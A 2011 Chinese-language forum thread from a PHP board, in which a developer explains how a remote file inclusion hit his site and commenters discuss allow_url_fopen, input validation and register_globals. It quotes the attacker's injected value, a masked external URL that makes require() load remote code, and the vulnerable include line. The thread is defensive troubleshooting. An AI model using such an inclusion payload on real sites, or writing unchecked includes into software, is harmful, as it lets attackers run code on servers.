作者september02 (九月二号)
看板PHP
标题Re: [请益] 网路攻击?
时间Tue Jul 5 21:40:08 2011
已经找到了漏洞了,所以上来报告一下
我程式中有一行
require $PATH.'config.php';
这个$PATH是和一个GET变数有关,所以被人把$PATH设成了
"
http://www.XXX.XX/webcam/pesquisadorRFI.txt?"
整行就变成了
require(
http://www.XXX.XX/webcam/pesquisadorRFI.txt?/config.php)
另外提醒大家
PHP.INI中的allow_url_fopen
最好是设成OFF(预设ON)
可以避免以上的问题发生
--
爱情真奇妙,可以让二个陌生的人变的如此亲密
婚姻更奇妙,可以让二个亲密的人变的如此陌生
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 218.167.184.34
1F:→ gname:我比较想知道为什麽你的GET会被窜改? source code被改? 07/05 23:16
2F:→ gname:还是你完全没有过滤就直接把GET就用上去了? 07/05 23:18
3F:→ mrbigmouth:比起关allow_url_fopen 对使用端的所有输入进行检查才 07/06 00:26
4F:→ mrbigmouth:是正道 07/06 00:26
5F:→ mrbigmouth:我的办法是在所有网页开头放置检查函数 详细定义这个 07/06 00:27
6F:→ mrbigmouth:网页有哪些POST或GET变数 变数是数字or字串 and长度等 07/06 00:28
7F:→ sdcomputer:变数污染的问题远比allow_url_fopen还重要多了.. 07/06 00:32
8F:→ bibo9901:应该是把register_globals关掉才对 07/06 01:12
9F:→ MOONRAKER:register_globals不是控制要不要把$_REQUEST里面的东东 07/06 09:37
10F:→ MOONRAKER:注册成全域变数吗 他应该没有直接这样使用吧 07/06 09:38
11F:推 LPH66:$_GET 也是 $_REQUEST 里的东西啊... 07/06 13:14
12F:→ LPH66:所以这里就是那个人用 ?PATH=xxxx 去给它设值而已 07/06 13:15
13F:→ LPH66:我也觉得应该要关 register_globals 07/06 13:17
14F:→ MOONRAKER:他如果用$PATH=$_GET['path']那有没有关都一样啦 07/06 14:41
15F:推 LPH66:也是 所以还是自己程式写作的习惯问题... 07/06 17:48
16F:→ september02:是的,是我写程式的习惯不好... 07/07 12:09
17F:→ mirae:不管习惯好不好,官方register_global建议要关掉,有安全问题 07/10 08:36
19F:→ MOONRAKER:新的没有人还开着了吧。 07/11 17:43
20F:→ mirae:告诉学员说register_global必须打开程式才能work..真实故事. 07/12 07:11
21F:→ mirae:这很难说,之前听过一个故事,某职训班PHP讲师上课时演示程式, 07/12 07:14